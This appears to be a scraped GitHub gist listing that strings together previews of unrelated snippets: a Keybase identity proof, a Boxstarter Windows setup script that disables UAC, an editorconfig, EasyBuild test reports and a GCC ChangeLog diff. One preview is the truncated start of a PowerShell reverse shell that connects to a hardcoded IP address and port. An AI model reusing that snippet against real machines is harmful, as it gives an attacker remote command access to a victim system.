I hereby claim:
- I am froland on github.
- I am froland (https://keybase.io/froland) on keybase.
- I have a public key ASDFhMxs2WA0wgagk1Dbx_Hqwli9ksD8JPrKJma3_S6Ykwo
To claim this, I am signing this object:
| $socket = new-object System.Net.Sockets.TcpClient('192.168.129.29', 413); | |
| if($socket -eq $null){exit 1} | |
| $stream = $socket.GetStream(); | |
| $writer = new-object System.IO.StreamWriter($stream); | |
| $buffer = new-object System.Byte[] 1024; | |
| $encoding = new-object System.Text.AsciiEncoding; | |
| do | |
| { | |
| $writer.Flush(); | |
| $read = $null; |
| # Description: Boxstarter script | |
| # Author: François ROLAND | |
| # Script to setup a freshly installed machine | |
| Disable-UAC | |
| Disable-BingSearch | |
| Disable-GameBarTips | |
| Set-WindowsExplorerOptions -EnableShowHiddenFilesFoldersDrives -DisableShowProtectedOSFiles -EnableShowFileExtensions -EnableShowFullPathInTitleBar -EnableOpenFileExplorerToQuickAccess -EnableShowRecentFilesInQuickAccess -EnableShowFrequentFoldersInQuickAccess -EnableExpandToOpenFolder -DisableShowRibbon | |
| Set-BoxstarterTaskbarOptions -Combine Always |
| root = true | |
| [*] | |
| end_of_line = lf | |
| insert_final_newline = true | |
| charset = utf-8 | |
| indent_style = space | |
| indent_size = 2 |
I hereby claim:
To claim this, I am signing this object:
Test report for easybuilders/easybuild-easyconfigs#5828
Build succeeded for 1 out of 1 (1 easyconfigs in this PR)
Test report for easybuilders/easybuild-easyconfigs#5775
Build succeeded for 1 out of 1 (1 easyconfigs in this PR)
| --- branches/gcc-6-branch/libsanitizer/ChangeLog 2017/09/07 03:07:42 251827 | |
| +++ branches/gcc-6-branch/libsanitizer/ChangeLog 2017/09/07 07:15:24 251828 | |
| @@ -1,3 +1,14 @@ | |
| +2017-09-07 Matthias Klose <doko@ubuntu.com> | |
| + | |
| + Backported from mainline | |
| + 2017-07-14 Jakub Jelinek <jakub@redhat.com> | |
| + | |
| + PR sanitizer/81066 | |
| + * sanitizer_common/sanitizer_linux.h: Cherry-pick upstream r307969. |
| This is just a test |
| This is just a test |
| This is just a test |